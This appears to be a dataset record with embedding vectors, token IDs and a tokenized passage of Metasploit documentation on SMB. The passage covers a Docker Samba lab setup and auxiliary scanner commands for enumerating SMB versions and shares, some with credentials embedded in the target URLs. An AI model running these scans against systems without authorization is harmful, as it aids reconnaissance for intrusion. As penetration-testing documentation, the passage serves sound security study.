-0.7864439487457275, -0.502509593963623, -0.48062872886657715, 0.129276305437088, 0.40314048528671265, -0.1304590404033661, 0.6329258680343628, -0.14955176413059235, 0.7123080492019653, 0.11788281798362732, -0.08664590120315552, -0.0605502724647522, 0.6910857558250427, -1.0553396940231323, -1.1249604225158691, 0.5794722437858582, 0.18520388007164001, -0.4678889811038971, 0.5434542894363403, -0.28836384415626526, 0.7886773943901062, -0.7174326777458191, 0.6959366798400879, 0.9487911462783813, 0.046966392546892166, 0.377451628446579, -0.7042409777641296, 0.44682934880256653, 0.48231565952301025, -0.6995546817779541, 0.22892379760742188, 0.35230571031570435, 0.2917749881744385, -0.6120242476463318, -0.37220123410224915, -0.508992075920105, -0.22417058050632477, -0.20872384309768677, 1.2559622526168823, -0.20674467086791992, 0.8686288595199585, -0.12412353605031967, -0.9481166005134583, -0.7932555675506592, 0.25936877727508545, 0.5333541035652161, 0.5839069485664368, 0.12460970878601074, 0.22238977253437042, 0.48118680715560913, 0.19973532855510712, -0.2487184703350067, -0.11697720736265182, -0.5238685607910156, 0.7499709129333496, 0.09051010757684708, -0.6234124302864075, 0.5398030877113342, 0.00996075663715601, -0.33856001496315, -1.2251814603805542, -0.6216142773628235, 0.14398445188999176, -0.0736519992351532, -0.4385244846343994, -1.191086769104004, -0.19760815799236298, 0.21609260141849518, 0.4260159432888031, 0.20339226722717285, -0.0727362111210823, -0.16703328490257263, -0.5495307445526123, 0.2550084590911865, -0.60117506980896, 0.15918953716754913, 0.5550756454467773, 0.11136209964752197, 0.1315564513206482, -0.7048402428627014, -0.31233158707618713, -0.7458086609840393, 0.07380972057580948, 0.07632582634687424, 0.6863098740577698, 0.9796974062919617, 0.22465889155864716, -0.11663409322500229, 1.4414960145950317, -0.4249849021434784, 0.4740290939807892, 0.3267976641654968, -0.8575139045715332, -0.8352901339530945, -0.13579709827899933, -0.5765257477760315, -0.0043357908725738525, 0.24950391054153442, -0.19458547234535217, -0.05949815362691879, 0.07582942396402359, -0.013495251536369324, 0.07430911064147949, -1.512353539466858, 0.6321754455566406, -0.7449485659599304, -0.7914217710494995, -0.45247983932495117, -0.11733754724264145, -0.0538799874484539, -0.4136695861816406, -0.30548256635665894, 0.24854524433612823, -1.1107391119003296, -0.06090640276670456, 0.3908175826072693, -0.6534712910652161, -0.5745226740837097, -0.3278059959411621, -0.2610548436641693, -0.5386649966239929, -1.0544941425323486, 0.1594366729259491, -0.21266548335552216, -0.6247836947441101, -0.3455619215965271, -0.3575631380081177, -0.2015220671892166, 0.5853683352470398, -0.12028515338897705, -0.4401237666606903, 0.23287007212638855, -0.6078336834907532, 0.1168346107006073, -0.1467418521642685, -0.5468518137931824, 0.871764063835144, 0.2042207270860672, -0.636617124080658, 0.8526732325553894, -0.06760560721158981, 0.2905655801296234, 0.13071700930595398, 0.04464741796255112, 0.9646223187446594, -0.323334276676178, -0.6754420399665833, 0.24431011080741882, 0.46205073595046997, -0.34072422981262207, 0.1344563215970993, -0.7311260104179382, -0.4782997667789459, 0.1361376792192459, 0.5226476192474365, 0.5692400932312012, 0.6882351636886597, -0.3535330593585968, -0.007536675315350294, 0.10815270245075226, 0.6517426371574402, 0.7930856347084045, 0.667671263217926, -0.8083994388580322, -0.1410517543554306, -0.2803439497947693, -0.012231562286615372, 0.06122966483235359, 0.3446619212627411, 0.2457660436630249, 0.28117793798446655, -0.18962334096431732, -0.40626758337020874, -0.0734746903181076, -0.31157034635543823, -0.37073129415512085, 0.2392563372850418, 0.37302687764167786, 0.243435800075531, 0.02858058549463749, -0.3191104531288147, -0.16352568566799164, -0.5448014140129089, -0.9829398989677429, 0.04616781696677208, 0.43942347168922424, -0.4940914511680603, 0.021042579784989357, -0.024043995887041092, -0.35210928320884705, 0.10270795226097107, 0.39259013533592224, 0.25064578652381897, -0.03212786093354225, -0.21500249207019806, 0.3557276427745819, 0.3375432789325714, -0.08864262700080872, -0.2920534610748291, -0.08891782909631729, 0.25677576661109924, -0.15943749248981476, -0.6634291410446167, -0.05965748056769371, 1.2268866300582886, -0.41438525915145874, -0.011433413252234459, -0.46100786328315735, -0.20075005292892456, 0.3371339440345764, 0.361701637506485, -0.3231097459793091, -0.14267568290233612, -0.3054494261741638, 0.5350574851036072, -0.27207040786743164, 0.21860457956790924, 0.03029278665781021, 0.07304342091083527, -0.13267211616039276, -0.44214868545532227, 0.08991419523954391, 0.6568353176116943, 0.08661945164203644, 0.014851835556328297, 0.3532494902610779, 0.5190334320068359, 0.3281937539577484, -0.3956388831138611, -0.109517902135849, -0.3274490535259247, 0.40063244104385376, 0.7365444302558899, 1.0990638732910156, 0.30133530497550964, 0.8688825368881226, 0.5356455445289612, -0.754781186580658, 0.037251438945531845, 0.02706732228398323, -0.27903494238853455, -0.14656507968902588, 0.6493768095970154, -0.5724693536758423, -0.08512977510690689, -0.5926764011383057, -0.33928826451301575, -0.08137054741382599, -0.34720468521118164, 0.40109169483184814, -0.7802713513374329, 0.029118668287992477, 0.3884598910808563, -0.6646469235420227, -0.24953848123550415, 0.5254931449890137, -0.6536802649497986, 1.4706344604492188, 0.4051664173603058, -0.6069880127906799, -0.25556448101997375, 0.7178530693054199, 0.7787508964538574, -0.38069671392440796, 0.21646995842456818, 0.36731186509132385, 0.2981097102165222, -0.3847000002861023, 0.1581389456987381, -0.4969000518321991, 0.19356678426265717, -0.28853461146354675, -0.12581411004066467, -0.3648337423801422, 0.06008555740118027, -0.5474560856819153, -0.13693343102931976, 0.010763689875602722, -0.025826120749115944, 0.05755244195461273, -0.4760758578777313, 0.4880531132221222, -0.2762109339237213, 0.16075760126113892, 0.043218258768320084, -0.37996330857276917, -0.33859047293663025, 0.03478045389056206, 0.660832941532135, 0.38684791326522827, 0.4476920962333679, 1.287334680557251, 0.3194887936115265, 0.6030048727989197, 1.1218432188034058, -0.3620918393135071, 0.2179640233516693, 0.3585819602012634, -0.5362198948860168, -0.14917299151420593, 0.3016814589500427, -0.049252577126026154, 0.01309226080775261, -0.45972633361816406, -0.26798081398010254, 0.25528842210769653, 0.755888819694519, 0.3553038239479065, -0.8706967830657959, 0.33656564354896545, -0.30584716796875, -0.5493105053901672, -0.20347721874713898, 1.015631914138794, 0.5430771112442017, 0.00005037090159021318, -0.565787136554718, -0.11985234171152115, -0.37020349502563477, 0.4641326367855072, -0.8107487559318542, 0.0005789769347757101, -0.2141650766134262, -0.44931548833847046, -0.4506080448627472, -0.9733561277389526, 0.28418275713920593, -0.20915979146957397, -0.6981545090675354, -0.23196785151958466, 0.687508225440979, 0.18498404324054718, 0.6973653435707092, 0.3189682960510254, 0.2503238320350647, 0.07610908150672913, 0.7514641880989075, 0.596649706363678, -0.04774916172027588, 0.1198517307639122, 0.11479437351226807, -0.45327115058898926, -0.04485365375876427, -0.06305746734142303, 0.3424310088157654, -0.11445323377847672, -0.22660738229751587, 0.688092827796936, 0.4352668225765228, -0.9182254076004028, -0.9945663809776306, -0.15447324514389038, 0.2545173764228821, 0.22796379029750824, 0.193772554397583, -0.5854048728942871, -0.48133885860443115, -0.7337338924407959, -0.1672903150320053, -0.7385539412498474, -0.11792736500501633, -0.4369496703147888, -0.3447774350643158, -0.2845715880393982, -0.8495501279830933, 4.329370021820068, 0.8013975024223328, 0.7994326949119568, -0.38794171810150146, 0.4543702304363251, 0.32069942355155945, 0.19708779454231262, -0.49613437056541443, -0.2485867291688919, -0.5567079186439514, 0.5652644038200378, -0.3515523076057434, 0.30192282795906067, 0.3960164785385132, 0.5234710574150085, 0.37577641010284424, -0.06869835406541824, 0.6858941316604614, 0.0703868567943573, -0.9311928749084473, -0.4085471034049988, 0.14525987207889557, -0.35361719131469727, 0.8528157472610474, 0.17770548164844513, 0.579472005367279, 0.45895665884017944, -0.7646846175193787, 0.1926182359457016, -0.9887702465057373, 0.48121246695518494, -0.09382740408182144, 0.4965810775756836, -0.0879424512386322, -0.0920579805970192, 0.4993625283241272, 0.4189216196537018, 0.02631366066634655, 0.06054965779185295, -0.7687197327613831, 0.3603358268737793, -0.5127447247505188, -0.18632520735263824, -0.3183618187904358, -0.49185070395469666, 0.48446470499038696, -0.5262653231620789, 0.8962313532829285, 0.6647414565086365, -0.5867588520050049, 0.33785760402679443, 0.1253708153963089, 0.0961715504527092, -0.7205227017402649, -0.9820961356163025, 0.47217053174972534, 0.38700366020202637, -0.0869058296084404, -0.007726540323346853, 0.4717160165309906, 0.17582786083221436, 0.2719074785709381, -0.16174155473709106, 0.3709477484226227, 0.34804049134254456, 0.7083798050880432, 0.24673143029212952, -0.05388159677386284, -0.2251937836408615, -0.6467939615249634, -0.11252382397651672, -0.4558188319206238, -0.3378247916698456, -0.8008825778961182, 0.12221228331327438, 0.24056562781333923, 0.41593578457832336, 0.41065552830696106, 0.7570320963859558, -0.3472461700439453, 0.039587657898664474, -0.27170518040657043, -0.5836535096168518, 0.048728618770837784, 0.05704016983509064, 0.12092255055904388, -0.5075908899307251, -0.3758089542388916, -0.018476145341992378, -0.06971286982297897, 1.0569475889205933, 0.027532028034329414, -0.626043975353241, 1.082151174545288, 0.47882452607154846 ]
[ 2428, 1010, 2045, 2323, 2022, 2053, 2709, 2127, 1996, 5806, 16639, 1010, 2144, 1996, 2655, 2000, 4942, 21572, 9623, 2015, 1012, 2448, 2987, 1521, 1056, 2709, 2127, 2008, 5806, 8289, 1007, 1012, 14427, 3406, 3926, 2039, 1010, 2035, 2057, 2342, 2003, 2000, 9375, 1996, 18077, 4118, 1012, 2023, 4118, 2003, 2170, 2011, 18804, 13102, 4135, 4183, 2043, 2017, 2224, 2448, 2306, 1037, 5796, 11329, 5644, 9890, 1012, 2035, 2008, 2057, 1521, 2222, 2079, 2182, 2003, 6140, 1037, 2210, 3570, 4471, 1998, 2448, 1996, 18077, 1010, 2021, 2101, 2017, 2064, 19933, 2023, 4118, 2000, 5047, 4530, 7347, 2004, 2092, 1024, 13366, 18077, 6140, 1035, 3570, 1006, 1000, 23448, 1001, 1063, 4539, 1012, 2171, 1065, 2005, 1001, 1063, 2951, 23809, 2063, 1031, 1005, 18093, 1005, 1033, 1065, 1000, 1007, 15389, 1035, 3094, 1006, 18093, 1012, 12359, 1007, 2203, 2065, 2017, 1521, 2128, 2770, 18804, 13102, 4135, 4183, 1998, 1996, 8211, 18750, 2326, 2006, 1996, 2168, 3698, 1010, 2017, 2323, 2022, 2583, 2000, 3432, 2275, 1996, 10857, 1998, 2543, 1024, 2275, 1054, 15006, 2102, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 2275, 1048, 15006, 2102, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 2448, 7091, 8322, 2102, 1521, 1055, 2009, 1012, 2404, 2009, 2035, 2362, 1998, 2017, 2031, 1037, 2200, 3722, 3094, 13341, 18077, 11336, 2008, 3065, 2017, 1996, 24078, 1997, 2129, 2000, 5466, 1037, 18093, 1012, 2377, 2105, 2007, 2367, 18093, 2015, 1010, 3582, 1996, 2129, 1011, 2000, 1011, 2224, 1011, 3094, 1011, 2754, 2869, 5009, 1010, 5587, 2070, 15899, 2000, 1996, 18750, 4773, 8241, 1010, 1998, 3422, 22679, 2058, 14666, 8167, 2243, 1012, 2017, 1521, 2222, 4553, 1037, 2843, 1012, 102 ]
metasploit
109.txt
4
[CLS] smb workflowssmb ( server message blocks ), is a way for sharing files across nodes on a network. there are two main ports for smb : 139 / tcp - initially microsoft implemented smb on top of their existing netbios network architecture, which allowed for windows computers to communicate across the same network445 / tcp - newer versions of smb use this port, were netbios is not used. other terminology to be aware of : smb - serer message blockscifs - common internet file systemsamba - a free software re - implementation of smb, which is frequently found on unix - like systemsmetasploit has support for multiple smb modules, including : version enumerationverifying / bruteforcing credentialscapture modulesrelay modulesfile transferexploit modulesthere are more modules than listed here, for the full list of modules run the search command within msfconsole : msf6 > search mysql lab environmentwhen testing in a lab environment - smb can be used on a window ’ s host machine, or within docker. for instance running samba on ubuntu 16. 04 : docker run - it - - rm - - publish 127. 0. 0. 1 : 139 : 139 - - publish 127. 0. 0. 1 : 445 : 445 ubuntu : 16. 04 / bin / bash mkdir - p / tmp / foo apt update apt install - y samba verifying version is as expected : $ samba - - version version 4. 3. 11 - ubuntu configuring the share : cat < < eof > > / etc / samba / smb. conf [ foo _ share ] comment = foo samba share path = / tmp / foo read only = no browsable = yes eof restart the service : service smbd restart smb enumerationenumerate smb version : use auxiliary / scanner / smb / smb _ version run smb : / / 10. 10. 10. 161 enumerate shares : use auxiliary / scanner / smb / smb _ enumshares run smb : / / 10. 10. 10. 161 run smb : / / user : pass @ 10. 10. 10. 161 run'smb : / / domain ; user with spaces : pass @ 192. 168. 123. 4'smb : : alwaysencr
[ 0.46219000220298767, 0.030828556045889854, 0.04291391372680664, 0.91453617811203, 0.08430949598550797, -0.3986780345439911, -0.22712643444538116, 0.36314910650253296, 0.3687836825847626, 0.29454469680786133, -0.21459774672985077, 0.2057131826877594, 0.6237790584564209, -0.44164571166038513, -0.40970560908317566, -0.7125059366226196, -0.05846495181322098, -0.017509764060378075, -1.0236468315124512, -0.3209947347640991, 0.5253046154975891, -0.441596657037735, -0.591467559337616, -0.687523365020752, -0.6287459135055542, 0.6922197341918945, 0.5183518528938293, -0.5038902759552002, 1.009655475616455, 0.29989492893218994, 0.49018192291259766, -0.5906233191490173, -0.20075666904449463, -0.8375421762466431, 0.2690393328666687, 0.08486734330654144, 1.0472500324249268, -0.7686535716056824, 0.2371068149805069, -0.7016380429267883, 0.19110523164272308, -0.29911988973617554, 0.418686181306839, -0.5814675688743591, 0.07542384415864944, -0.6402698159217834, 0.519039511680603, 0.5905901789665222, 0.9198575019836426, -0.21112918853759766, 0.05288328602910042, 0.18885104358196259, -0.11257315427064896, 0.3668423891067505, 0.3532078266143799, -0.10500974953174591, -0.7683140635490417, -0.2846950590610504, -0.025906376540660858, 0.5475099682807922, 0.26863303780555725, 0.3783997595310211, 0.288748174905777, -1.2726476192474365, 0.8217303156852722, 0.04016410931944847, -0.09206865727901459, -0.6970244646072388, -0.07297157496213913, -0.6134245991706848, 0.17102374136447906, 0.5156858563423157, -1.160791039466858, -0.28076598048210144, -0.6627837419509888, -0.08752359449863434, -0.2881056070327759, -0.22849424183368683, -0.26086634397506714, 0.7767465710639954, -0.2643283009529114, 0.020265433937311172, 0.5703637599945068, 0.10605291277170181, -0.5964933037757874, -0.9519844055175781, 0.7440358996391296, 0.5319352746009827, -0.2773922085762024, 0.081093430519104, -0.23103071749210358, 0.20502758026123047, -0.6903574466705322, -0.14342010021209717, 0.8117085099220276, 0.6615077257156372, -0.461405485868454, -0.06949610263109207, -0.045601073652505875, -0.19590355455875397, 0.49931055307388306, 0.28402575850486755, 0.10501459240913391, 0.09329292923212051, -0.6982540488243103, 0.11734016984701157, 0.43466484546661377, 0.22605744004249573, -0.7920835018157959, -0.18183548748493195, 0.26720094680786133, -0.4302605092525482, 0.3596090078353882, -0.5567030906677246, -0.12193230539560318, 0.5167891383171082, 0.7263030409812927, -0.1051645278930664, -0.4601573348045349, 0.5346278548240662, 0.40902045369148254, -0.1955169141292572, -0.03634007275104523, -0.6213756799697876, 0.049915023148059845, 0.273098349571228, 0.29279670119285583, 1.1314735412597656, -0.7353617548942566, -0.6008829474449158, -0.115973562002182, 0.31394195556640625, 0.16539740562438965, 0.24858178198337555, 0.20197103917598724, 0.39562681317329407, 0.04822983220219612, 0.3613208532333374, 0.8167908787727356, -0.8837554454803467, -0.04370594024658203, 0.5259959101676941, 0.011170642450451851, 0.9663156867027283, 0.04519698768854141, -0.1450328379869461, -0.2959228754043579, -0.22862185537815094, -0.5832433700561523, 0.3861748278141022, 0.11294213682413101, -0.2510822117328644, 0.5065023303031921, -0.610329270362854, -0.3935474157333374, 0.151381716132164, -0.2876397967338562, 0.3873729109764099, -0.5902127623558044, 0.45832476019859314, -0.5550987720489502, 1.3334485292434692, -0.12444360554218292, 0.481742262840271, -0.6843429207801819, 0.27885740995407104, -0.09223535656929016, -0.36213576793670654, -0.4906182289123535, -0.12996678054332733, -0.7509284019470215, 0.669697642326355, 0.03498650714755058, 0.751021146774292, 1.083478569984436, 0.5093708038330078, -0.10008256882429123, -0.18037962913513184, 0.3731907606124878, 0.04912916570901871, -0.6686986088752747, 0.2730414569377899, 0.5619646310806274, 0.9692429304122925, -0.4350130259990692, 0.007138202898204327, 0.6624831557273865, -1.3319385051727295, -0.47232586145401, 0.10083039104938507, -0.057884540408849716, 0.32851532101631165, -0.767930805683136, 0.4034431278705597, 0.4486619234085083, -0.0003619910858105868, -1.1300950050354004, -0.5878210663795471, 0.42735734581947327, -1.4649943113327026, -0.7962554693222046, 0.7927137613296509, -0.039954785257577896, 0.8607235550880432, -0.43280336260795593, -0.9623770713806152, 0.4632299542427063, 1.0993385314941406, 0.37646108865737915, -0.0706019178032875, 0.826458215713501, 0.2816074788570404, -0.5439795255661011, -0.050230082124471664, 0.5677404999732971, -0.1288096010684967, -0.2226908802986145, 0.04384231194853783, 0.12048592418432236, -0.1333632618188858, -0.18182560801506042, 0.6166542172431946, 0.31991642713546753, 0.4742284119129181, -0.489313542842865, -0.11964365839958191, 0.29509788751602173, 0.055539414286613464, -0.3371485471725464, -0.13889852166175842, -0.42351269721984863, 0.12010251730680466, 0.533994197845459, 1.1047358512878418, 0.06275235116481781, -0.019976906478405, 0.6564245820045471, 0.13738378882408142, 0.18334046006202698, -0.10539893805980682, -0.20016326010227203, 0.4417773485183716, 0.5242767930030823, 0.887597918510437, 0.2718614637851715, -0.190483957529068, 0.16901004314422607, 0.007392784580588341, 0.027319250628352165, 0.3281269967556, -0.1864205002784729, 0.6455883383750916, 0.24839076399803162, 0.029094358906149864, -0.4212450385093689, -0.5381336808204651, 0.7494919896125793, 0.7176080346107483, -1.1509376764297485, -0.8351083993911743, -0.007691996172070503, -0.10854564607143402, -1.1181515455245972, -0.25901076197624207, 0.4180084466934204, 0.517518937587738, -0.3763653635978699, 0.0670519545674324, -0.3326432406902313, -0.2094360589981079, -0.611721396446228, 0.02068052440881729, -0.433200865983963, -0.5955798029899597, -0.41822612285614014, -0.01740228570997715, 0.24760358035564423, -0.486240953207016, 0.9959954023361206, -0.27954721450805664, -0.5059460401535034, 0.3634764850139618, 0.5879826545715332, 0.3408433794975281, -0.04277341067790985, 0.11309404671192169, -1.15323805809021, 0.03250178322196007, 0.37486934661865234, 0.6138527989387512, -0.7379547953605652, 0.27230584621429443, -0.10414984077215195, 0.058315299451351166, 0.04621335119009018, 0.042755771428346634, 0.7648003697395325, -0.10548101365566254, 0.09680522978305817, -0.3089885115623474, -0.2597622573375702, -0.34544408321380615, 0.08090797066688538, -0.8134016990661621, -0.15279492735862732, 0.27442413568496704, -0.449974000453949, -0.7057628631591797, 0.32387998700141907, 0.9131256937980652, -0.3300822973251343, 0.3458775281906128, -0.2693709135055542, 0.3086400628089905, -0.6975300908088684, 0.7245702147483826, 0.37748804688453674, 1.009542465209961, -0.04556135833263397, 0.05931302160024643, 0.0027379970997571945, -0.807590126991272, -0.8128365278244019, -0.28359469771385193, -0.26729974150657654, 0.19025819003582, 0.54021155834198, -0.9262017011642456, 0.42333677411079407, -0.8123945593833923, -0.40194860100746155, -0.25897330045700073, -0.8154611587524414, 0.5611619353294373, 0.06297062337398529, 0.7800732254981995, 0.05228997766971588, -0.6709755063056946, 0.07483972609043121, -0.14687705039978027, 0.11057225614786148, -0.03197816386818886, 0.30671602487564087, 0.5436996221542358, -0.6196642518043518, 0.21992051601409912, 0.053450778126716614, -0.02796582505106926, -0.31584423780441284, -0.27935969829559326, -0.3790224492549896, 0.03281567990779877, 0.34424465894699097, -0.054593201726675034, 0.13393431901931763, 0.44173452258110046, -0.6932141780853271, -0.05255766212940216, 0.6433807015419006, 0.3464534282684326, 0.6107918620109558, 0.13507306575775146, 0.01290737185627222, -0.13060419261455536, -0.043610092252492905, -0.6436226963996887, 0.5079343318939209, 0.12788410484790802, 0.28873902559280396, -0.13775300979614258, 0.8319227695465088, -0.12828922271728516, 0.24379396438598633, 0.6315813660621643, -0.34742215275764465, -1.2047345638275146, 0.5481889247894287, 0.036974649876356125, 0.6643352508544922, -0.15721756219863892, 0.4012030363082886, -0.3166685402393341, 0.47480276226997375, 0.06724218279123306, 0.48771873116493225, -0.1121702566742897, -0.18421635031700134, -0.3068728744983673, 0.3759172260761261, 0.12831085920333862, -0.27492836117744446, -0.41898173093795776, 0.11170679330825806, 0.1618693619966507, -0.13322767615318298, -0.7300020456314087, 0.4254981279373169, 0.6065616011619568, 0.5588634014129639, 0.48063069581985474, 0.4523777961730957, 0.07635058462619781, -0.384042888879776, 0.3577336072921753, -0.5890679359436035, 0.7137489914894104, -0.3589779734611511, 0.3015502691268921, 0.19507372379302979, 0.2984665036201477, -0.5324540138244629, -0.3218493163585663, -0.013502352871000767, 0.3580896556377411, 0.5728909969329834, -0.13677480816841125, -0.9772166609764099, -0.8118528723716736, -0.3724272847175598, 0.3305375277996063, -0.8087331056594849, -0.037347786128520966, 0.32603082060813904, 0.7964448928833008, -0.14244022965431213, -0.5100785493850708, -0.23076237738132477, -0.5500468611717224, 0.555901288986206, 0.19121700525283813, -0.6991983652114868, -0.10628955811262131, -0.31590867042541504, -0.39432743191719055, -0.5156251788139343, 0.8043299317359924, 0.020445123314857483, 0.43222084641456604, -0.36609044671058655, -0.789364755153656, 0.04999289661645889, 0.6139705777168274, -0.12619857490062714, -0.6623741984367371, 0.0903824046254158, 0.2932415306568146, 0.5630573034286499, 0.40523698925971985, 0.03716501593589783, -0.6721184849739075, -0.31407761573791504, 0.22067797183990479, 0.398113489151001, -1.0951294898986816, 0.19967684149742126, 0.18985046446323395, -0.37698498368263245, 0.09318303316831589, 0.29033857583999634, -0.3063284754753113, 0.45609548687934875, -0.1768551766872406, 0.2201571762561798, 0.24606138467788696, -0.1238725334405899, 0.817708432674408, 0.27346229553222656, -0.013144232332706451, -0.017023324966430664, 0.9916381239891052, -0.5912137031555176, 0.5753540396690369, -0.08110456168651581, -0.5256683230400085, 0.9031460285186768, -0.565956175327301, 0.5856173634529114, 0.3594171404838562, 0.17353513836860657, -0.11545849591493607, -0.2433847188949585, 0.8737888336181641, 0.11200082302093506, 0.9533616304397583, -0.9497010707855225, -0.3052319884300232, 0.05040719732642174, 0.4973616898059845, -0.03799596428871155, 0.14721164107322693, 1.0073962211608887, 0.08677447587251663, 0.1369658261537552, -0.47350478172302246, -0.4950838088989258, -0.6748433709144592, -0.1658443957567215, 0.08560116589069366, 0.12997843325138092, 0.36349600553512573, 0.5288137793540955, -0.9634813666343689, -0.7003957629203796, 0.4803154766559601, -0.1429579257965088, -0.043441396206617355, -0.7261231541633606, -0.2455325424671173, -0.3703678548336029, 0.37175023555755615, -0.0825846716761589, 0.060362718999385834, -0.043080106377601624, -0.10984436422586441, -0.15255993604660034, 0.42565956711769104, -0.08217152953147888, -0.13174153864383698, -0.08540921658277512, 0.39047229290008545, 0.49027153849601746, -0.9173385500907898, -0.3135990798473358, 0.07510600239038467, -0.6854568123817444, -0.17554761469364166, -0.2935093343257904, 0.15989579260349274, -0.42706185579299927, -1.0448689460754395, -0.323819100856781, -0.6980782747268677, 0.3902582824230194, -0.20047223567962646, -0.08709874749183655, -0.3678339123725891, 0.5650771856307983, 0.285082072019577, -0.5352154970169067, 0.5592331290245056, -0.02100388891994953, -0.2122029960155487, -0.11229588836431503, -0.16371408104896545, -0.5914053916931152, -0.0027253495063632727, -0.0710059329867363, 0.6532440781593323, 0.019393565133213997, -0.14826196432113647, -0.43548646569252014, -0.05525154247879982, 0.19322068989276886, -0.14699970185756683, -0.37467095255851746, -0.17922775447368622, -0.4271402657032013, -0.36939576268196106, -0.08174825459718704, 0.6976426243782043, -0.6913576722145081, 0.6583258509635925, -0.008427640423178673, -0.27718010544776917, -0.07552078366279602, -0.10941027104854584, -0.2838892340660095, -0.44551166892051697, 0.551892101764679, -0.6194093227386475, 0.24505269527435303, -0.018975108861923218, 0.9015783667564392, -0.17545229196548462, -0.1900378316640854, -0.5207302570343018, 0.017913084477186203, -0.3926207423210144, -0.6267417073249817, 1.0479719638824463, 0.126836359500885, -0.2719172239303589, 0.03070537932217121, 0.034117650240659714, 0.5490292906761169, 0.03588615730404854, 0.23125258088111877, 0.8238281607627869, -0.053864479064941406, 0.346660852432251, -0.8572767972946167, 0.6918951869010925, 0.14099553227424622, 0.46629077196121216, 0.21192671358585358, -0.2691696286201477, -0.1823703944683075, 0.14165452122688293, -0.6688461899757385, -0.1637723445892334, -0.42811164259910583, -1.0680185556411743, 0.8199754357337952, -0.5083509087562561, 0.5980444550514221, -0.7385714650154114, -0.937332034111023, -0.004210215527564287, -0.05287301540374756, 0.22024224698543549, -0.8102947473526001, 0.2062077522277832, 0.4335692524909973, 0.7187134623527527, -0.45742663741111755, 0.1490374356508255, -0.4008215665817261, -0.08489293605089188, 0.5067115426063538, -0.45126503705978394, -0.7530152797698975, 1.0812281370162964, 0.9199995398521423, -0.6612008810043335, -0.2459517866373062, -0.41132885217666626, -0.027930330485105515, 0.3911612331867218, 0.03040982224047184, -0.05996832624077797, 0.13180986046791077, 0.01190145779401064, -0.12056197971105576, 0.4219003915786743, 0.3991134464740753, -0.23633162677288055, -0.6687290072441101, 0.5181314945220947, -0.12167349457740784, 0.48232921957969666, 0.453482449054718, -0.4830763041973114, -0.44060608744621277, -0.4744035005569458, -0.18716339766979218, 0.13309481739997864, 0.017518727108836174, 0.686846137046814, -0.6570932865142822, 0.1960204541683197, -0.10981030017137527, -0.6250930428504944, 0.8685237765312195, 0.02974623255431652, 0.3957560956478119, 0.487678587436676, 0.0621454082429409, -0.12766186892986298, -0.16384585201740265, -1.067724347114563, 0.1341426819562912, 0.5178375840187073, -0.31504026055336, 0.05555504560470581, -0.09293682873249054, -0.29867860674858093, 0.2797399163246155, -0.39940762519836426, -0.6321028470993042, -0.3777768015861511, 0.3430807590484619, -0.3631937801837921, 0.16040609776973724, 0.4075759947299957, 0.27592340111732483, 0.15497425198554993, -0.9121286273002625, -0.46992725133895874, 0.2271135002374649, -0.5571065545082092, 0.2867234945297241, -0.38770171999931335, 0.06833687424659729, -0.813889741897583, -0.5719287395477295, -0.32038065791130066, -0.09031186252832413, -0.5143597722053528, -1.0639923810958862, -0.39044931530952454, 0.16991354525089264, -0.5820950269699097, 0.7069060206413269, -0.01848806068301201, -0.3738514482975006, 0.23498354852199554, -0.5990070700645447, 0.2683039903640747, 0.967470645904541, -0.5840891003608704, 0.17305941879749298, -0.030794240534305573, 0.32143670320510864, 0.4948488473892212, -1.0078952312469482, -0.04256884381175041, -0.5028278827667236, -0.30751141905784607, 0.49118879437446594, 1.043801188468933, -0.9543272852897644, 0.05269768461585045, -0.10964643955230713, -0.4532935917377472, -0.21833448112010956, -0.14161935448646545, 0.5575395226478577, 0.0918269157409668, -0.5947480201721191, -0.09256087243556976, 0.6183789968490601, 0.1339237242937088, 0.22489316761493683, -0.6545076966285706, 0.6536285281181335, 0.007339847274124622, 0.48344260454177856, 0.007575514726340771, 0.15503264963626862, 0.022900458425283432, -0.1606009155511856, -0.009997470304369926, 0.20045757293701172, -0.6528047323226929, 0.06681054085493088, 0.0138184679672122, -0.315446138381958, -0.25541508197784424, -0.4347887337207794, 1.0734857320785522, 0.16526417434215546, 0.21391652524471283, -0.45731431245803833, 0.23436886072158813, -0.44703465700149536, -0.34794458746910095, 0.04210030660033226, -0.5798844695091248, 0.04613356664776802, 0.16996288299560547, -0.18325456976890564, 0.023003363981842995, -0.5162065625190735, -0.24923615157604218, 0.36783894896507263, -0.043617188930511475, -0.26000532507896423, 0.7994140982627869, -0.5884219408035278, -0.11525441706180573, 0.970324695110321, -1.0407432317733765, 0.00623144069686532, -0.7275084257125854, 0.6422065496444702, -0.7051851749420166, -0.859968900680542, 0.7884872555732727, 0.6953465938568115, -0.00031378408311866224, 0.05671139061450958, -0.6956150531768799, 0.5265061259269714, 0.30633485317230225, -0.23082976043224335, -0.3868059515953064, 0.3855707049369812, -0.9634184837341309, 0.5668331980705261, -0.06381294876337051, -0.09179249405860901, -0.28777578473091125, 0.23299159109592438, 0.17074616253376007, 0.024120375514030457, -0.5878578424453735, 0.6010778546333313, 0.1924760341644287, -0.11803217232227325, 0.5700766444206238, 0.442195326089859, 0.20978310704231262, -0.28059718012809753, 0.6545019745826721, -0.7445108294487, -0.034839581698179245, 0.3944924473762512, 0.13292784988880157, -0.08005882054567337, 0.29040297865867615, 0.15342581272125244, -0.4024057984352112, -0.1384967863559723, 0.6338809132575989, -0.42459356784820557, -0.8005712032318115, -0.0247191172093153, -0.14711172878742218, 0.27212420105934143, 0.23187069594860077, -0.12570726871490479, 0.14639800786972046, 0.08643335103988647, -0.039108116179704666, 0.29228678345680237, 0.17267848551273346, 0.8088766932487488, -0.6966378092765808, 0.6946552991867065, 0.18692715466022491, 0.14788559079170227, -0.1737474501132965, 0.2719619870185852, -0.9974296689033508, 0.8019160032272339, 0.8195568919181824, -0.10474959760904312, -0.03467386215925217, 0.9192044734954834, -0.18184511363506317, 0.5172376036643982, 0.5062280297279358, 0.022007469087839127, -0.4477095901966095, 0.08765992522239685, -0.3678024113178253, 0.021854477003216743, -0.2882072925567627, 0.21595001220703125, -0.46716517210006714, 0.025862401351332664, 0.44470810890197754, -0.14497414231300354, -0.054143451154232025, -0.9806337952613831, -0.21461254358291626, -0.6369667649269104, 0.18807701766490936, 0.7407312393188477, -0.646068811416626, -0.007253791205585003, 0.45768070220947266, 0.4531290531158447, 0.345466285943985, 0.05924975872039795, 0.7529287338256836, -0.2099902182817459, 0.5033910274505615, 0.6334795355796814, -0.45671066641807556, -0.30847635865211487, 0.037812989205121994, -0.6487924456596375, -0.47370445728302, -0.17397046089172363, -0.19409576058387756, 0.7739804983139038, 0.1698049157857895, 